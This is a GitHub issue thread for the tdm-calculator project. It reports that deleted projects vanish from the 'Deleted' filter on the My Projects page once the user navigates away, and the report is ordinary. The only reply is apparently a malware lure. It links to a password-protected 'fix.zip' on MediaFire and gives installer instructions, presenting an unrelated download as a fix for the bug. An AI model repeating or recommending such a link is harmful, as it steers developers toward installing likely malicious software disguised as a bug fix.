### ISSUE TITLE
Bug: Cannot view deleted projects in the my projects list

### ISSUE THREAD

**Issue by NilakshiS** [hackforla/tdm-calculator#1808]
#### Describe the bug 

Cannot view projects with the status "Deleted" on the "My Projects" page, unless you delete a project and immediately set the filter to view delete projects. Also does not work if you navigate away from the "My Projects" page after deleting a project. Currently affects the TDM-Admin (ladot@dispostable.com) account, unsure if more users are affected. 

This bug prevents users from restoring a project they've previously deleted and is responsible for inconsistent behavior of the filter by "Deleted" status feature.

#### Steps to reproduce the issue

1. Login to the [dev site](https://tdm-dev.azurewebsites.net/login).
2. Go to "My Projects" page.
3. Select a project that belongs to the currently logged in user (create one if none exist).
4. Delete the project.
5. Click on "Filter By" button.
6. In the panel that opens, set status to "Deleted".
7. A list of previously deleted projects is shown.
8. Navigate to "About" page then go back to the "My Projects" page.
9. Use "Filter By" button to filter projects by "Deleted" status again.

#### What's the expected result?

After the last step, a list of previously deleted projects should by displayed.

#### What's the actual result?

Instead, no projects are displayed in the list.

#### Additional details / screenshot
Filter results BEFORE navigating away from the page:
![image](https://github.com/user-attachments/assets/4b67dd2c-2755-4ff0-8790-9cbd12d6b66a)

Filter results AFTER navigating away from the page:
![image](https://github.com/user-attachments/assets/3c324f3c-832f-4928-b63a-900e4b10a2d8)

#### Device configuration

- Device: desktop computer
- OS version: Windows 11 OS
- Browser: Chrome
- Browser version: 128.0.6613.113

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
